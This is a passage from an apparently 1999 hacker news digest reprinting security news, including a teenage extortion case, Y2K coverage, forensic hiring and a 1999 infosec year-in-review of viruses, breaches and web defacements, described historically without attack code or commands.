bail hearing yesterday on request of his lawyer. Meanwhile, Toronto police are scanning his hard drive, seized from his computer, to see just what else the juvenile hacker has been up to. "We have no idea how far this goes or if this is the only company that has been victimized," said Det. Myron Demkiw of the west-end 14 division. He was guarded about the youth's technique and background because the accused is a young offender. However, Jim Carroll, co-author of the Canadian Internet Handbook, says the youth probably isn't a computer genius. "Most of the time hackers can do what they do because of negligence on the part of the network administrators," he said. The York region youth was charged with hacking to the company's site and changing passwords to prevent the owner from accessing his mail. He then demanded $5,000 from the owner to return control and was arrested when he came to collect his cash. The network hacker is one of three types, which also include the virus builder and software cracker (someone who "cracks" the anti-piracy protection on software to allow it to be copied and bootlegged). While the youth certainly has some knowledge of the Internet and computer language, he's probably not the stereotypical hacker, said McMaster University professor David Jones of the Electronic Frontier Canada. He said there's a whole community of like-minded computer fans who share information on weaknesses in security systems and passwords online. "It's like kids playing Nintendo 64; it's a whole different world," he said. "They know all the cheat codes to get to other levels and characters. How? They just know." Both Jones and Carroll said any system that allowed a 14-year-old to breach security was "pretty crappy." "For the kids who do it, it's like a game; they gain face by getting into system," Jones said. @HWA 13.0 Poulsen's List of Gifts to Get a Hacker 12/26/99 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Ya its a little late, maybe next year? heh - Ed From HNN http://www.hackernews.com/ contributed by Evil Wench Kevin Poulsen has published a Christmas shopping list for the hacker. Kevin could have shown some more creativity, not to mention a longer list. While the items he has chosen are ok, my wish list is quite a bit longer and a lot more expensive. Everyone knows Hackers want LOTS of goodies for the holidays. (LEDs = Power Whoever has the most when they die, wins. ZD Net http://www.zdnet.com/zdtv/cybercrime/chaostheory/story/0,3700,2412532,00.html A Hacker Christmas Last-minute gift purchases for the hacker in the house. By Kevin Poulsen December 22, 1999 With each passing holiday season, it seems I'm asked more and more frequently, "Kevin, what do I get a hacker for the holidays?" Here are a few answers. The Happy Hacker keyboard from PFU America dispenses with such frivolities as a caps-lock key, numeric keypad, or function keys, and finally puts the control key back where it belongs-- next to the left pinky finger. Don't even ask where the Windows key is. The design is openly hostile to everything Microsoft, making it particularly popular with the Linux set. The keyboard is meant for coding, though its super-compact 11.6 x 4.3 inch footprint makes it attractive to anyone tired of stretching to reach the mouse. Regrettably, it comes only in white, but optional carrying cases in burgundy, navy, and black make it a fashionable tote for contemporary cyberpunks. Too Hip? Looking for stocking stuffers? I recommend The Matrix on DVD. The film itself is a hacker-culture masterpiece. More importantly, the DVD format recently earned a certain cachet when hackers took the trouble to reverse engineer the copy protection scheme so they could watch movies on their Linux boxes. The Matrix title has the added coolness that comes with being so advanced that it doesn't work on some older models of consumer DVD players. It's not a bug, it's a feature! For the Kid in All of Us Toys of any kind are a popular Christmas treat, and there are certain kinds of playthings that have a fundamental appeal to hackers of all ages. A passion for LEGO's interlocking building blocks, popular in the 1960s, has been a dirty little secret shared by many hackers for generations. It got a shot in the arm recently, when LEGO created Mindstorms, a fully motorized, programmable robotic block system, with infrared communications and embedded light sensors, among other features. Mindstorms was meant for kids: it comes with friendly software that lets little tykes program their robotic creations with point-and-click ease. Hackers, however, are doing, well, what hackers do: writing an open source operating system for the brainy blocks which includes dynamic module loading and a memory management system. The legOS programmers (no, I'm not making this up) recently fixed a bug in their inter-block packet switching code, just in time for Christmas. Gifting in Style Finally, this holiday season, say it with wearable computing. Xybernaut offers a lightweight, 233-MHZ system that clips to any utility belt or an optional vest. A headset serves as a user interface, allowing the lucky recipient of your Yuletide generosity to issue voice commands through a microphone while viewing output on a one-inch diagonal monitor that hangs in front of the wearer's left eye. Add a wireless modem, and the hacker in your life need never log off the Net. @HWA 14.0 More FUD About Cyberterrosists and Y2K 12/26/99 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Gh0st47 As we get closer and closer to that magical day, January 1st, the media will continue to increase the FUD factor regarding Y2K. Since the initial problem of computer meltdown seems to be fading away the issue of viruses and terrorist attacks is getting more attention. While the threats are definitely real it is doubtful they are fantastic as most would have us believe. Access Atlanta http://www.accessatlanta.com/partners/ajc/epaper/editions/today/news_23.html NATION IN BRIEF Monday • January 10 Slain soldier's parents ponder suing Army The parents of slain Pfc. Barry Winchell are considering suing the Army for failing to protect their son from anti-gay harassment. In an interview Sunday, Pat and Wally Kutteles said military officials at Fort Campbell, Ky., did not take sufficient precautions to prevent Winchell's July 5 beating. Winchell, who was rumored to be gay, was attacked by another soldier as he was sleeping. Pat Kutteles said commanders at the 101st Airborne Division tolerated a four-month harassment campaign against her son in clear violation of the Pentagon's ''don't ask, don't tell'' policy toward gays, a standard that has come under mounting criticism in recent weeks. The Kansas City, Mo. couple's comments came a day after Army Spc. Justin R. Fisher, 26, pleaded guilty to obstructing justice and lying to military investigators in connection with Winchell's death. Fisher, who was sentenced to 12 1/2 years in prison, wiped blood off the bat that Pvt. Calvin N. Glover used to kill Winchell. Prosecutors had said Fisher, who was Winchell's barracks mate, encouraged Glover to attack Winchell. Glover, 18, was convicted last month of premeditated murder and sentenced to life in prison with the possibility of parole. FBI watched mayor for 40 years, paper says The late Detroit Mayor Coleman Young was under FBI surveillance for roughly four decades, The Detroit News reported Sunday. Records obtained under the federal Freedom of Information Act show the surveillance began in the 1940s when agents who suspected the well-known labor activist had Communist ties followed him to union meetings, the newspaper said. Young was mayor for 20 years, retiring in 1994. He died in 1997. Elderly avoid crime by staying at home Violent criminals attack Americans age 65 or older far less often than younger men and women, probably because older people do not go out at night as much, the Justice Department reported Sunday. There were an average of 5.3 violent crimes for every 1,000 U.S. residents age 65 or older each year from 1992 through 1997, the department's Bureau of Justice Statistics said. About 22 percent of elderly violence victims reported they never went out at night for entertainment, shopping or other activities. Controversial exhibit ends run in New York Art lovers and the morbidly curious flocked to New York City's Brooklyn Museum in large numbers on Sunday for a last look at the controversial ''Sensation'' art exhibit with its dung-decorated Madonna. As the crowd swelled on the final day of the exhibit's three-month run, about two dozen demonstrators stood outside, singing hymns and reciting ''Hail Mary,'' a Catholic prayer, in protest of what they claim is a blasphemous painting of the Virgin Mary. Chris Ofili's painting, ''The Holy Virgin Mary,'' features the Virgin Mary decorated with elephant dung. @HWA 15.0 The Datacore Encryption Suite 1.0 Released on Christmas 12/26/99 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by The Hex The Datacore releases The Datacore Encryption Suite 1.0 on December 25. DES1.0 consists of an easy to use interface, and uses many well know algorithms. They hope you enjoy the program. The Datacore http://www.tdcore.com/newbuild/fractal/preview.html (197k download) @HWA 16.0 One Third of UK Vulnerable to Online Attack 12/27/99 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench A survey of 150 UK-based IT managers and directors who use the Internet as a business tool, found that one third of them did not have adequate measures in place to prevent a cyber attack. The study, conducted by Novell, found that 37% of UK companies on the net have no firewall and 44% do not make use of authentication. Info-Sec.com http://www.info-sec.com/internet/99/internet_122799b_j.shtml @HWA 17.0 Grades Changed at NY School 12/27/99 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by pyrodude2001 According to school officials at Spencerport High School a student may have accessed the grading system of the school's computer and changed a few of them. Officials are unsure of how the intrusion occurred or if in fact any grades where changed. As a precaution teachers will manually verify the grades in the computer with their records. Rochester News http://www.rochesternews.com/1225grades.html (Sorry, link gave us a 404 - Ed) @HWA 18.0 Cops Wanted, Hackers Need Not Apply 12/27/99 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond What do Deloitte & Touche, Ernst & Young and PricewaterhouseCoopers all seem to have in common? According this article it is that all of them are looking for ex-law enforcement personnel to work in their computer forensic divisions. No, they don't want people who have been dealing with computer security since they where three, they want someone with a background in dealing with rapists and hit men. NY Times - Yes registration is required. Just use a fake address. http://www.nytimes.com/library/financial/personal/122699personal-cybercrime.html December 26, 1999 CALLINGS The Hunt for Cybercrime Issue in Depth The New York Times: Your Money Forum Join a Discussion on Career and Workplace Issues By LAURA PEDERSEN-PIETERSEN racking down embezzlers, computer hackers, money launderers, shady stock promoters and other white-collar criminals may lack the pizazz of James Bond outwitting Goldfinger or decapitating Oddjob. But in a post-cold-war global economy, don't be surprised if some of the first movie heroes of the new millennium are bespectacled, Palm VII-packing auditors from Big Five accounting firms, Web browsers at the ready. "The breadth of criminal activities facilitated by global computer networks, such as lifting personal credit card information, redirecting electronic funds and stealing proprietary and other confidential information, continues to grow," said Stephen O. Pierce, a partner at PricewaterhouseCoopers who heads its investigations unit. And crimes could hit close to home. One of the firm's clients, the Pension Benefit Guaranty Corporation, a federal agency that sends checks to some 500,000 retirees, recently found its computer defenses penetrated by security experts who could have robbed it blind. The reason they didn't was that the break-in was a test of the agency's systems, determining that for all the electronic safeguards, it was vulnerable to external and internal attack. With businesses rushing to go online, theft and fraud are not far behind. E-commerce has spawned its own array of hard-to-detect cybercrimes, like transaction fraud and Web site destruction. The crimes are producing not only fear in corporations, but also many new assignments for auditors and consultants, who are increasingly being asked to trace e-mail and ferret out smoldering diskettes. But in trying to find gumshoes who can sniff out white-collar crime from three cubicles away, Big Five recruiters obviously won't find many candidates on the B-school campus. That is why, over the last 18 months, almost all of the 25 new employees hired for the Deloitte & Touche forensic and investigative services division came with law-enforcement experience. And PricewaterhouseCoopers, in addition to hiring former F.B.I. and Interpol agents, has just recruited Scott Charney, 43, formerly a top cybercop at the Justice Department. At Ernst & Young, the forensic investigations practice has more than tripled in two years, said Cheryl Sparkes, a partner. "We've gone from 30 to 100 employees and we're aggressively seeking more," she said, "mostly with law enforcement and other investigative backgrounds." ONSIDER Don M. Svendson, 50, hired last year after a 26-year career with the Royal Canadian Mounted Police to run Deloitte & Touche's investigative office in Chicago. "There's no end in sight to the rise in embezzlement, executive malfeasance and money laundering," he said. Though a roaring economy and the dot-com invasion make pastures greener for criminal activity, Mr. Svendson says there is more to it than that. "Corporations are leaner and meaner, the management turnover is high and companies can't exercise all the controls they really need," he said. Mr. Svendson may well be a typical recruit -- someone with professional training in criminal justice and decades of hands-on experience. While the job may not sound as adrenaline-pumping as his previous work -- which included commanding a SWAT team in Manitoba and breaking up riots -- he says he finds it thrilling. Having extracted confessions from rapists and hit men, Mr. Svendson was recently asked to put his interrogation skills to work on someone suspected of embezzlement at a company after irregularities were found. Mr. Svendson said he got the employee to confess; the employee was dismissed. "You need to know what body language to look for and how to ask the questions," Mr. Svendson said. Ed Rial, 40, recently made the leap from criminal justice to corporate fraud investigation, and is now a Deloitte partner. Mr. Rial, who dreamed as a boy of being a detective, graduated from the University of Pennsylvania law school in 1984 and took a job at the Justice Department in Manhattan. He spent almost a decade as a federal prosecutor and four years in charge of a New York office of the department's business and securities fraud unit, bringing to trial cases involving drugs, murder and kidnapping. With Deloitte since November, Mr. Rial specializes in hunting down corporate fraud, kickback schemes and insurance fraud. These days, he sees stock fraud as the fastest-growing white-collar crime. In particular, he cites outfits that take shell companies public, trade with cronies, then dump the shares into the public's lap through cold calls. "Many of these boiler-room brokers worked for years as telemarketers," Mr. Rial said. "They have phenomenal sales skills and are completely unscrupulous. And it's incredible the amount of participation they get from smart people -- doctors, lawyers and educators." The quick stock-market success of Internet companies, he added, makes people more susceptible to high-technology pitches from fraudulent promoters. And many people don't think of white-collar crime as a big issue anyhow. "It's because the perpetrators are often the people you grew up with, the best friend of your father," Mr. Rial said."They're almost always people in very senior positions. Believe me, no one ever says, 'I always suspected him.' " @HWA 19.0 IDS Signature Database Open to the Public 12/27/99 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by vision arachNIDS (Advanced Reference Archive of Current Heuristics for Network Intrusion Detection Systems) is now open to the public. The database is an attempt to profile probes, exploits, and other network-borne attacks by way of packet details, example sniffer traces of the attack, and a signature that can be exported for use in free IDS products such as Snort. This preliminary release will be greatly expanded upon as time goes by. Whitehats.com http://whitehats.com/ @HWA 20.0 InfoSecurity 1999 Year in Review 12/27/99 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench InfoSecurity Magazine has published its 1999 Year in Review. Their list contrasts greatly with the top stories of 1999 as picked by HNN. Info Security Magazine http://www.infosecuritymag.com/dec99/1299Yr.inRev.htm HNN's 1999 Year in Review http://www.hackernews.com/special/1999/99topstories.html (See elsewhere in this issue) Info Security Mag: 1999 Infosecurity Year-in-Review From Melissa to Explore.Zip, from Hotmail to TWINKLE, from BubbleBoy to BO2K, from InfraGard to Fidnet, the events of 1999 put information security in the public eye and on the corporate roadmap like never before. As we look back on the year that was, it’s clear just how important infosec has become to the stability and prosperity of commerce, communication and international peace. BY M.E. KABAY This article is excerpted from ICSA Labs’s Infosec Year-in-Review database, which classifies hundreds of cases and issues spanning the field of information security. The complete report will be available for download as a PDF file in early 2000. www.icsa.net 1999 was a remarkable year in the field of information systems security. Ten years from now, the last year of the second millennium will be remembered for a number of important events: • In the fight against malicious code, 1999 was the year the AV experts’ direst predictions came true: e-mail-enabled viruses and worms are now a serious threat to systems everywhere. Because these new forms of malicious software can spread so fast through the ’Net, waiting for antivirus vendors to produce updates to signature tables is not enough to protect everyone. In 2000, the AV industry will need to develop better heuristic techniques to identify the abnormal behavior of such viruses/ worms, stopping them even if they aren’t immediately identified by their signatures. • In addition to losing its landmark antitrust case with the Justice Department, Microsoft was again the target of widespread criticism in 1999 for its "security" practices, including its absurd policy of turning every consumer product it makes into a programming language (or the equivalent of an operating system). The security community’s message to the Redmond software giant is now louder than ever: Stop this nonsense of allowing automatic execution of macros when opening Word and Excel files. And it would be helpful if Windows had provisions for enabling pop-up warnings that could be configured—preferably by default—to warn naive users about the risks of opening executables of unknown origin. Will Microsoft listen? Only time will tell. Meanwhile, the public release of Win2K is only eight weeks away. • The number of successful attacks on Web sites increased dramatically in 1999. More and more script kiddies are plastering graffiti on government, industry and educational Web sites as if they were engaged in a video game. Systems administrators continue to be deprived of adequate resources and management support to keep Internet-visible networks patched so that vulnerabilities are fixed before someone can exploit them. • In addition to the script kiddie wars, 1999 witnessed several cases of Web defacement that seemed to be a form of information warfare. Chinese and Taiwanese hackers attacked government sites on both sides of the water, and Serbian and Kosovar hackers did the same to each other’s governmental sites. • Privacy has developed as perhaps the single greatest concern of the ordinary Internet-using public in 1999. There have been many legislative initiatives to improve privacy in the United States and elsewhere; the new EU Data Privacy Directive has serious implications for all organizations intending to do business with Europe. • Ah, yes, and then there’s Y2K. I deliberately omitted mention of the Y2K problem in the following article, since most would argue it’s not really a "security" issue to begin with. Suffice it to say, the Y2K transition may be the best opportunity we’ll ever have to witness the equivalent of information warfare on our highly technological society. I hope there won’t be any trouble, but if there is, we should observe carefully and learn quickly from our mistakes. Now, here’s a review of some of the year’s other major events, broken out within nearly two-dozen categories. Breaches of Confidentiality 4.22.99 Joe Harris, a computer technician at the Seattle-area "Blarg! Online" ISP, discovered that improperly installed shopping-cart software, used widely on the ’Net to simplify shopping, can allow anyone to see confidential data, such as credit card numbers. Security analysts pointed out that the plain ASCII file where such data are stored should not be on the Web server at all—or if it is, the file should be encrypted. Initial evaluation suggested that the weakness affects at least several hundred, and possibly many thousands, of e-commerce sites where the software was improperly installed. Wiretapping, Interception (Not Jamming) 4.27.99 The Australian Security Intelligence Organization (ASIO) announced its intention to seek remote access to computer records of suspects under investigation. However, a spokesman for the ASIO said the organization had not yet broken into computers using existing technology, since that was not permitted under current law. Data Diddling, Data Corruption 3.01.99 We learned in March that two more Chinese criminal hackers were sentenced to death in China in December 1998. The twin brothers stole 720,000 Yuan (~US$87,000) from a bank in Zhenjiang and transferred the money to their own accounts. Viruses, Hoaxes, Trojans 3.27.99 On Friday, March 26, CERT/CC received initial reports of a fast-spreading new MS-Word macro virus called Melissa. Once loaded, it used the victim’s MAPI-standard e-mail address book to send copies of itself to the first 50 people on the list. The virus attached an infected document to an e-mail message bearing the subject line, "Important Message From ," where was that of the inadvertent sender. The e-mail message read, "Here is that document you asked for … don’t show anyone else ;-)" and included an infected MS-Word file as an attachment. The original infected document, "list.doc," was a compilation of URLs for pornographic Web sites. 3.30.99 Hot on the heels of the Melissa outbreak, a similar virus attacking MS-Excel spreadsheets appeared on the ’Net at the end of March. The so-called PaPa macro virus was more virulent than Melissa in that it sent out copies of itself to 60 names drawn from the victim’s e-mail address book, and did so every time an infected document was opened. 4.26.99 According to newswire reports, the Chernobyl computer virus struck hundreds of thousands of computers in Asia and the Middle East, with Turkey and South Korea each reporting 300,000 damaged computers. 5.28.99 Network Associates’s antivirus labs warned of a new Trojan called BackDoor-G, which was being sent around the ’Net as spam. 6.11.99 The Explore.Zip worm appeared as an attachment to e-mail masquerading as an innocuous compressed WinZip file. The executable file used the icon from WinZip to fool people into double-clicking it, at which time it began destroying files on disk. 9.02.99 Symantec announced the discovery of a dangerous MS-Word 97 macro virus called Thursday, which had a trigger date of Dec. 13. This virus was seen in the wild on about 5,000 computers in Austria, France, Germany, Ireland, Latvia, Poland, Switzerland, the U.K. and the U.S. The payload could erase all files on the victim’s C: drive. 9.20.99 A couple of new Y2K-related virus/worms were discovered in September. One e-mail Trojan, called Y2Kcount. exe, claimed that its attachment was a Y2K-countdown clock; actually, it sent user IDs and passwords out into the ’Net by e-mail. Microsoft reported finding eight different versions of the e-mail in circulation. The other Y2K virus, named W32/ Fix2001, came as an attachment (ostensibly from the systems administrator) and urged victims to install the "fix" to prevent Internet problems related to the Y2K transition. Actually, the virus/worm would replicate through attachments to all outbound e-mail messages from the infected system. 11.08.99 In early November, a worrisome new worm called BubbleBoy appeared on the scene. This proof-of-concept worm was sent to Network Associates, which immediately posted a free software patch and alerted the FBI of the danger. The problem with this worm was that it would infect a host if an MS-Outlook user merely highlighted the subject line of the carrier e-mail message—no double-clicking was required. The worm’s payload was mild—changes to the registry and a simple display screen—but experts warned that the same techniques could carry much more dangerous payloads in future variations. The worm spread by mailing itself to every e-mail address on the infected system’s address list, thus posing an even greater potential danger than the Melissa virus. This attack again demonstrates the foolishness of allowing automatic execution of code by e-mail and word-processing packages. Industrial Espionage, Infowar 1.04.99 An article in January reported on the RAND Corporation’s DoD-commissioned report, "Strategic Information Warfare Rising," issued in mid-1998. The report fueled the growing debate within the Pentagon about the wisdom of pursuing offensive information warfare capabilities. Opponents argued that widening the sphere of warfare to include cyberattacks on critical infrastructure would only increase the likelihood of successful attacks on the United States. The report laid out four basic scenarios for future developments in infowar (IW). Daniel Verton, writing in Federal Computer Week, summarized these scenarios as follows: • U.S. supremacy in offense and defensive strategic IW. • A club of strategic IW elites, whereby a policy of no first use of strategic IW capabilities could be established. • Global "defensive dominance" in strategic IW, whereby a regime would be established to control the spread of strategic IW similar to biological and chemical weapons. • Market-based diversity, whereby the damage or disruption achievable through a strategic IW attack is modest and recovery is fast. 3.30.99 When NATO began bombing Serbia in March, Serbian hackers began a low-level campaign of harassment directed at U.S. government and military agencies. The "Black Hand" hacker group—possibly named after the notorious Sicilian secret society associated with the Mafia—and the "Serbian Angel" hackers threatened to damage NATO computers in retaliation for the war against the Serbs. On March 29, the White House Web site was defaced by red letters reading "Hackerz wuz Here." Speculation was rife that anti-NATO activists were involved. According to a Russian newspaper, unknown hackers on March 30 damaged a main NATO Web server, forcing it offline for at least a half-hour. The claim, however, was unconfirmed by NATO sources. Penetration, Phreaking, Legal Action 9.10.99 According to a report in The Wall Street Journal, the successful Y2K-compliance tests carried out in early September by the North American Electric Reliability Council (NERC) with the involvement of more than 500 utilities, electric cooperatives, power pools and power plants were marred by a criminal-hacker penetration of the Bonneville Power Administration center. The Bonneville center happened to be where Bill Richardson, the Secretary of the Department of Energy, was observing the tests. 9.29.99 Frans De Vaere admitted breaking into the Web site of a Belgian bank in mid-August. He stole logon IDs and passwords and successfully accessed the account balances of many customers. Luckily, De Vaere was unable to effect any transactions. The bank, identified as "Generale de Banque" in a report in The Scotsman newspaper, refused to take legal action against De Vaere. However, the Skynet ISP run by the state telecom company, Belgacom, was not so accommodating. The criminal hacker broke into more than 1,000 Web sites on Skynet and stole the credit card numbers of about 20 clients. Police began an investigation, but unfortunately Belgium has no specific law addressing computer crime, and so the intruder went unpunished. Counterfeits, Forgery (Including Piracy), Shoulder Surfing 4.10.99 Jim Loney wrote a summary for Reuters about the losses due to piracy of intellectual property and counterfeiting. Some key points of Loney’s report include the following: • U.S. Customs Commissioner Bonni Tischler predicted that copyright violations and counterfeiting was "going to dwarf every type of crime in the next millennium." • U.S. companies lose an estimated $200 billion a year to product piracy involving designer clothes, shoes, handbags, software, CDs and videos. • Worldwide, software piracy costs industry $11 billion a year. • 38 percent of the 615 million new software product installations are illegal copies. • 97 percent of all the software in Vietnam is stolen. • More than 90 percent of all software in Bulgaria, China, Indonesia, Lebanon, Oman and Russia is stolen. • 60 percent of the software sold via online auctions is illegitimate. Sabotage (Excluding Web Sites) 4.14.99 In Melbourne, Australia, a 33-year-old network administrator pleaded guilty to three charges of damaging property and 30 charges of computer trespass. Ya Ge (Jacob) Xu admitted hacking into his former employer’s systems at Integraph Public Safety to plant a virus and to "cause trouble" when he was refused acceptable payment for unpaid overtime. Xu was fined AU$6,000, but was not sentenced to jail time. 9.29.99 A criminal hacker calling himself "Red Attack" threatened Belgian firms with electronic sabotage in a misguided attempt to draw attention to security vulnerabilities. A few weeks later, a different person claimed he was the real Red Attack, saying he would switch Belgian electrical power off for a couple of hours on Sept. 29 and break into the Belgian Prime Minister’s e-mail account. After earnest conversations with a company director of the Electrabel utility, the idiot agreed that maybe his demonstration wasn’t such a great idea after all. In the end, the threats all evaporated in yet another hoax perpetrated on gullible journalists and officials. Quality Assurance (Security Products) 8.31.99 In August, two serious security holes were demonstrated on Microsoft’s Hotmail system, which the company claims to be the biggest free Web-mail system in the world, with millions of subscribers. The problems were as follows: (1) An error in the code for entering data into a form allowed a user login without any password at all; (2) An undocumented back door allowed anyone to log in to any Hotmail account using the canonical (or possibly Canadian) password "eh." These problems meant that all unencrypted Hotmail e-mail was readable to anyone who used the exploits, and that such people could also impersonate their victims through e-mail. The holes caused Microsoft to shut down access to Hotmail for a day while the vulnerabilities were removed. Availability Issues (Not Denial-of-Service) 3.01.99 Jerry Leichter pointed out in RISKS that URLs are an unstable form of reference to scholarly work. He cited a case in which interesting papers disappeared from an academic Web site when the sponsoring research was disbanded. He also worried about using commercial sites as repositories for papers, arguing that the vicissitudes of the market make the destiny of such storage uncertain at best. 10.20.99 The Encyclopaedia Britannica opened its long-awaited free Web site—www.britannica.com—which immediately crashed because an order of magnitude more people tried to access the site than expected. Java, Javascript, ActiveX, Mobile Malicious Code 1.15.99 Drs. Edward Felten and Gary McGraw published a new book about mobile code security. In addition to the physical book, Securing Java: Getting Down to Business With Mobile Code, these experts put the entire text online at www.securingjava.com. The hope was that the free edition would not harm sales of the paper book. 8.03.99 Because Microsoft believes that word processing, spreadsheet and presentation software should allow automatic execution of macros—thus turning these products into programming languages—they also allowed their Internet Explorer browser to load these programs without alerting users. In August, Microsoft scrambled to issue patches to correct this design flaw so that unwary users would not be subjected to hostile code merely by downloading documents from a hostile Web site or by reading e-mail attachments. The principle still stands: Don’t double-click attachments of uncertain origin or unvalidated safety. RFI, Jamming (Not Interception) 1.29.99 In Crystal River, Fla., an innocent user unknowingly blocked all other cellular calls in his area whenever he used his new cell phone. The outages lasted 10 days while GTE tracked the problem down to his phone, which they replaced. This case illustrates the susceptibility of the highly computer-dependent cellular-phone system to disruption. 4.16.99 Automatic garage doors in a six-mile radius of the port at Hobart, Australia, were shut down by the USS Carl Vinson’s powerful 310-320 MHZ communications transmitters—which happened to override the short-range electronic communications channel allocated by the Australian regulatory bodies for such devices as garage-door openers. In addition, one poor soul was unable to move his car when the transmissions overrode his car security system, locking the vehicle down until the huge ship left. Operating Systems, Network Operating Systems, TCP/IP Problems (Alerts) 1.12.99 Microsoft admitted that its Windows 95, Windows 98 and Windows NT operating systems contained a bug in the MSVCRT.DLL file that would delay the start of daylight savings time by a week on April 1, 2001. The April Fool’s bug would affect about 95 percent of all PCs in the world, but could be fixed by patches that were posted on the Web by Microsoft. 7.26.99 CERT/CC issued an alert on buffer overflow vulnerabilities on several UNIX systems, including Solaris and HP-UX. Using this violation of memory array restrictions, criminal hackers could plant logic bombs and back doors on victimized systems. Manufacturers scrambled to provide patches. Denial-of-Service 1.12.99 According to an article by Tim Barlass in the Daily Telegraph of Australia, someone launched a sustained smurf denial-of-service attack on Ozemail, a popular Australian ISP. A smurf attack uses widely available software written by criminal hackers to send ping packets with forged origination in the headers to a (usually major) corporate network’s broadcast address. Every device—perhaps hundreds or thousands in all—sends a reply packet to the forged originator address. That system thus receives a flood of packets, often overloading its TCP/IP stacks and resulting in denial-of-service. The attack disrupted e-mail service for users in Sydney. A company spokesperson said Ozemail was trying to track down the perpetrator and was considering installing filtering software to prevent future attacks. 2.12.99 USA Today reported that Hotmail and Yahoo, providers of free e-mail, were improving security by shutting down any account subject to several unsuccessful attempts to log in. This is one of the oldest mistakes in systems management, since it immediately opens each account to a trivially easy denial-of-service attack: Simply try to log on several times to a victim’s account with a wrong password, and voilá, no further legitimate access is permitted until the account is reset. Web Attacks, Vandalism 1.16.99 Daniel Tobias was startled when a colleague complained that Tobias’s Web page included a link to a pornographic Web site. Indeed, one of Tobias’s originally inoffensive links was redirected to a porn site. The problem turned out to be Web URL hijacking: The original owner of a domain either sold its domain to the pornographer or allowed the domain registration to lapse. The new domain owner programmed his Web site to point all references to the original pages at the original domain to his home page, instead of returning a "404 Not Found" message. 10.26.99 A criminal hacker or hacker group calling itself "phreak.nl" attacked U.S. Web sites in the last week of October. According to a Newsbytes article by Bob Woods, the criminals damaged Web sites of NASA’s JPL, the U.S. Army’s Redstone Arsenal’s Program Executive Office and the National Defense University. All these sites were described by a hacker-publicity group, Attrition.org, as running Windows NT servers. The defacements consisted of the usual puerile sneers and insults in the peculiar spelling affected by the criminal hacker subculture. One common theme was the notion that "phreak.nl" was engaged in "a game ... called hack the planet." In addition to these attacks, phreak.nl also damaged sites for All Timeshare, Pet GBets and WPYC. Intrusion Detection Systems 7.29.99 A major row broke loose in the privacy community when the Clinton administration and the FBI announced their Federal Intrusion Detection Network (Fidnet) initiative to monitor network intrusions on not only government systems but also critical infrastructure components such as banking, communications and transport. House Majority Leader Dick Armey (R-Texas) attacked the Fidnet proposal, and the House Appropriations Committee removed funding for the project from its versions of the relevant appropriations bills. In August, one of Fidnet’s main architects spoke out in defense of the plan. Richard Clarke, National Coordinator for Security, Infrastructure Protection and Counterterrorism, explained that fears of an "electronic Pearl Harbor" (a term popularized by Winn Schwartau of infowar.com in the early 1990s) led to Presidential Decision Directive 63 and that Fidnet was one of the first major computer security programs proposed in response to the Directive. He assured skeptics of minimal involvement of the FBI, saying that Fidnet would be managed by the National Infrastructure Protection Center (NIPC), not the Department of Justice, and would not intrude on personal or corporate privacy. On Sept. 27, Rep. Armey sent another challenge to the DoJ demanding clarification of critical elements of Fidnet. Surveys, Estimates 2.23.99 The annual Australian Computer Crime and Security Survey, organized by the Victorian Computer Crime Investigation Squad and Deloitte & Touche Tohmatsu, reported on computer crimes in 350 of the largest Australian companies. In brief, the report found that about one-third of the respondents had suffered one or more attacks on their systems in 1998; of those, 80 percent had experienced insider attacks, while 60 percent had experienced outsider attacks. About 15 percent of the respondents that had experienced attacks said they had been the targets of industrial espionage. Almost three-quarters of all the respondents had no formal policy requiring notification of police authorities in case of attack. More than one-fifth of all respondents had experienced a breach of confidentiality; one-fifth also experienced a breach of data integrity. 4.07.99 The Fourth Annual Computer Security Institute/Federal Bureau of Investigation (CSI/FBI) Computer Crime and Security Survey demonstrated yet again that computer crime is a growing problem for U.S. companies, financial institutions and government agencies. Losses amounted to hundreds of millions of dollars, much of it resulting from industrial espionage. Among the survey’s key findings: • 26 percent of respondents reported theft of proprietary information. • System penetration by outsiders increased for the third year in a row; 30 percent of respondents reported intrusions. • Those reporting their Internet connection as a frequent point of attack rose from 37 percent of respondents in 1996 to 57 percent in 1999. • Unauthorized access by insiders rose for the third straight year; 55 percent reported incidents. • More companies—32 percent compared with 17 percent in the past three years—are reporting serious cybercrimes to law enforcement. 7.01.99 A survey of readers of this magazine confirmed that organizations conducting Internet e-commerce experience far more information security breaches than those that do not conduct e-commerce. Among other findings, the study found that companies conducting business online are 57 percent more likely to experience a leak of proprietary information, and 24 percent more likely to experience a hacking-related breach. Overall, the number of companies hit by an unauthorized access breach increased nearly 92 percent from 1998 to 1999. Average loss per company to security breaches was $256,000. 7.12.99 InformationWeek surveyed 2,700 information technology professionals in 49 countries on a variety of security-related issues. Among the highlights: • 64 percent of companies fell victim to a virus attack in the past 12 months, up from 53 percent the previous year. • In the U.S. alone, viruses hit 69 percent of companies, about four times as many as that of the next-highest category of security breach: unauthorized network entry. • 22 percent of companies reported no security breaches at all. • 48 percent of respondents blamed hackers for security breaches, up from 14 percent in 1998. • 31 percent of respondents blamed contract service providers for breaches (up from 9 percent in 1998). • 41 percent blamed authorized users and employees (down from 58 percent in 1998). 8.01.99 ICSA.net’s Fifth Annual Virus Prevalence Survey found that the likelihood of a company experiencing a computer virus more than doubled for each for the past four years. Approximately 43 percent of respondents had experienced a "virus disaster," defined as 25 or more PCs or servers infected at the same time. Slightly less than two-thirds of the latest virus disasters experienced were caused by macro viruses infecting Microsoft Word and Excel files. In 1999, more than half of the survey’s respondents encountered viruses via e-mail in their virus disasters, a significant increase over previous years. 